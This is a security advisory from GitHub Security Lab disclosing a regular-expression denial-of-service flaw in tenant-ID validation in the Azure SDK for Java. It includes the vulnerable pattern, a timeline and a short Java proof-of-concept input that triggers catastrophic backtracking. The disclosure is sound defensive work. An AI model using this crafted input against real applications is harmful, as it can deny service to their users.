GHSL-2022-024: Regular Expression Denial of Service (ReDoS) in the Azure SDK for Java.

Coordinated Disclosure Timeline

• 2022-04-07: Report sent to secure@microsoft.com
• 2022-04-07: MSRC Case 71264 was assigned
• 2022-05-30: An email asking for an update was sent
• 2022-08-12: An email asking for an update was sent
• 2022-08-13: A response was received that the issue was assessed and closed as low severity
• 2022-08-19: Publication of the advisory
• 2022-08-19: We receive an email telling us that Microsoft shipped a fix for this issue on May 7th in the 1.5.1 release of com.azure.identity: ValidationUtil.java

Summary

The Azure SDK for Java up to version 1.5.0-beta2 is vulnerable to Regular Expression Denial of Service (ReDoS) in the way it validates tenant IDs. Specially crafted IDs may cause catastrophic backtracking, taking exponential time to complete.

Product

Azure SDK for Java

Tested Version

• 1.5.0-beta.2
• 1.4.6

Details

Issue: Regular Expression Denial of Service (ReDoS) in ValidationUtil.java. (GHSL-2022-024)

The Azure SDK for Java provides the class ValidationUtil to perform validations on user-provided parameters. Its method validateTenantIdCharacterRange, used to validate tenant IDs, uses the following regular expression to do so:

private static final Pattern TENANT_IDENTIFIER_CHAR_PATTERN = Pattern.compile("^(?:[A-Z]|[0-9]|[a-z]|-|.)+$");

Note the nested repetition in (?:[A-Z]|[0-9]|[a-z]|-|.)+, specifically at the final dot (.) which also includes all the previous alternatives in the capturing group. The regex engine would need to exponentially backtrack [1] in order to distinguish which part of the expression (either the dot or one of the other alternatives) matches the input in case there is not a full match.

As an example, the following snippet shows how an application could be exploited using any string of characters (the length of which exponentially increases the time needed to complete the evaluation) that matches two alternatives of the expression, followed by a character that matches neither:

public class RedosAzureSdkPoc {
    public static void main(String[] args) {
        try {
            ValidationUtil.validateTenantIdCharacterRange("------------------------------\n",
                    new ClientLogger(RedosAzureSdkPoc.class.getName()));
        } catch (IllegalArgumentException e) {
        }
    }
}

Note that JDK 9 introduced important mitigations for this problem, so in order to reproduce the issue with the above example, the application using the Azure SDK must use JDK =< 8.

Impact

This issue may lead to denial of service of the application using the Azure SDK if user input reaches validateTenantIdCharacterRange.

Resources

[1] https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS [2] https://github.com/google/re2j

Credit

This issue was discovered and reported by the CodeQL team members @atorralba (Tony Torralba) and @joefarebrother (Joseph Farebrother).

Contact

You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2022-024 in any communication regarding this issue.